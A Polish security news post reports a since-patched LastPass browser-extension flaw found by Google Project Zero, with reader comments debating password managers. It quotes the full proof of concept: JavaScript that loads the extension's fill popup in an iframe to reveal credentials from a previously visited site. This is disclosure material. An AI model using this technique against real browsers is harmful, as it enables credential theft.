Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Managery haseł są dobre. Ich pluginy do przeglądarek mniej. Podatność w LastPass umożliwiająca wykradanie haseł.
Google Project Zero donosi o załatanej już podatności w LastPass (czy raczej przeglądarkowym pluginie dostarczanym przez tego managera haseł). PoC jest dość prosty i umożliwia na wykradzenie hasła wpisywanego na poprzednio odwiedzanej stronie:
1. Go to https://accounts.google.com, when prompted for password click the little „…” icon.
2. Go to https://example.com
3. Enter this in the console:
y = document.createElement(„iframe”);
y.height = 1024;
y.width = „100%”;
y.src=”chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html”;
// or y.src=”moz-extension://…”;
// or y.src=”ms-browser-extension://…”;
document.body.appendChild(y);
Notice that the credentials displayed are from the previous site.
Luka jest już załatana, ale warto pamiętać że to właśnie pluginy przeglądarkowe są piętą Achillesową managerów haseł…
–ms
LastPass/Bitwarden to syf. KeePass (którakolwiek wersja) jest znacznie lepszym rozwiązaniem. Jeżeli chcesz mieć bazę haseł zsynchronizowaną z innymi urządzeniami możesz użyć SyncThing, wtedy nic nie trafia do chmury. Jeżeli wolisz jednak użyć rozwiązania chmurowego jak NextCloud, ale (oessuu) GDrive to skorzystaj z BoxCryptora. Tylko pamiętaj keyfile nie uploadujesz NIGDZIE, jeżeli chcesz przerzucić na urządzenie użyj oldschoolowego kabla USB albo folderu dzielonego w ZAUFANEJ sieci. No i NIGDY NIE UŻYWAJ ROZSZERZEŃ DO HASEŁ. Nieważne z którego menadżera korzystasz.
PS: Wiem że Bitwarden ma możliwość postawienia na własnym serwerze, ale po tym jak główny dev podchodzi do wszelkich luk to nie brałbym nawet tej opcji poważnie.
POZDRO MORDY
Jakich rozszerzen ? Masz na mysli dodatkowe pluginy ?
No fajnie, pluginy to zło, to lepiej żeby hasła przechodziły przez schowek? :)
Najlepiej to mieć świadomość co się dzieje. W przypadku pluginu też masz „schowek” tylko mają do niego potencjalnie dostęp inne witryny ;-)
Troche clickbait. Zapomnieliscie o paru „szczegolach”
„To exploit this bug, a series of actions would need to be taken by a LastPass user including filling a password with the LastPass icon, then visiting a compromised or malicious site and finally being tricked into clicking on the page several times.”